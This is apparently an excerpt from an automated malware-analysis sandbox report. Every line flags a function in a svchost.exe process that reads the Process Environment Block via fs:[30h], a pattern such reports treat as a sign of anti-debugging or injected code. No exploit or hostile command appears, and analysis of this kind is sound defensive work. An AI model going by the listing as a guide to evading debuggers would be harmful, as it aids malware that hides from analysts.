                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov eax, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037DE10E mov ecx, dword ptr fs:[00000030h]2_2_037DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037601F8 mov eax, dword ptr fs:[00000030h]2_2_037601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AE1D0 mov eax, dword ptr fs:[00000030h]2_2_037AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F61C3 mov eax, dword ptr fs:[00000030h]2_2_037F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B019F mov eax, dword ptr fs:[00000030h]2_2_037B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03804164 mov eax, dword ptr fs:[00000030h]2_2_03804164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A197 mov eax, dword ptr fs:[00000030h]2_2_0372A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03770185 mov eax, dword ptr fs:[00000030h]2_2_03770185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037EC188 mov eax, dword ptr fs:[00000030h]2_2_037EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D4180 mov eax, dword ptr fs:[00000030h]2_2_037D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0375C073 mov eax, dword ptr fs:[00000030h]2_2_0375C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03732050 mov eax, dword ptr fs:[00000030h]2_2_03732050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B6050 mov eax, dword ptr fs:[00000030h]2_2_037B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C6030 mov eax, dword ptr fs:[00000030h]2_2_037C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A020 mov eax, dword ptr fs:[00000030h]2_2_0372A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C020 mov eax, dword ptr fs:[00000030h]2_2_0372C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0374E016 mov eax, dword ptr fs:[00000030h]2_2_0374E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4000 mov ecx, dword ptr fs:[00000030h]2_2_037B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037D2000 mov eax, dword ptr fs:[00000030h]2_2_037D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372C0F0 mov eax, dword ptr fs:[00000030h]2_2_0372C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037720F0 mov ecx, dword ptr fs:[00000030h]2_2_037720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0372A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0372A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037380E9 mov eax, dword ptr fs:[00000030h]2_2_037380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B60E0 mov eax, dword ptr fs:[00000030h]2_2_037B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B20DE mov eax, dword ptr fs:[00000030h]2_2_037B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov eax, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037F60B8 mov ecx, dword ptr fs:[00000030h]2_2_037F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037280A0 mov eax, dword ptr fs:[00000030h]2_2_037280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037C80A8 mov eax, dword ptr fs:[00000030h]2_2_037C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0373208A mov eax, dword ptr fs:[00000030h]2_2_0373208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03738770 mov eax, dword ptr fs:[00000030h]2_2_03738770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03740770 mov eax, dword ptr fs:[00000030h]2_2_03740770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730750 mov eax, dword ptr fs:[00000030h]2_2_03730750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037BE75D mov eax, dword ptr fs:[00000030h]2_2_037BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03772750 mov eax, dword ptr fs:[00000030h]2_2_03772750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037B4755 mov eax, dword ptr fs:[00000030h]2_2_037B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov esi, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376674D mov eax, dword ptr fs:[00000030h]2_2_0376674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov ecx, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376273C mov eax, dword ptr fs:[00000030h]2_2_0376273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037AC730 mov eax, dword ptr fs:[00000030h]2_2_037AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C720 mov eax, dword ptr fs:[00000030h]2_2_0376C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03730710 mov eax, dword ptr fs:[00000030h]2_2_03730710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03760710 mov eax, dword ptr fs:[00000030h]2_2_03760710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0376C700 mov eax, dword ptr fs:[00000030h]2_2_0376C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037347FB mov eax, dword ptr fs:[00000030h]2_2_037347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]2_2_037527ED
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037527ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BE7E1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373C7C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B07C3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037307AF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E47A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037D678E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03762674 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037F866E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A660 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374C640 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374E627 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03766620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768620 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0373262C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03772619 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE609 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0374260B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AE6F2 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B06F1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A6C7 mov ebx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A6C7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037666B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376C6A6 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03734690 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376656A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738550 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03740535 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E53E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804500 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375E5E7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037325E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376C5ED mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037365D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A5D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E5CF mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037545B1 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B05A7 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E59C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03732582 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03732582 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03764588 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375A470 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BC460 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037EA456 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372645D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375245A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376E443 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0376A430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372E420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372C427 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037B6420 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03768402 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037304E5 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037644B0 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BA4B0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037364AB mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037EA49A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0372CB7E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03728B50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037DEB50 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037E4B4B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037C6B40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037FAB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037D8B42 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EB20 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037F8B28 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037AEB1D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03804B00 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03738BF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_0375EBFC mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037BCBF0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_037DEBD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe, Code function: 2_2_03750BCB mov eax, dword ptr fs:[00000030h]
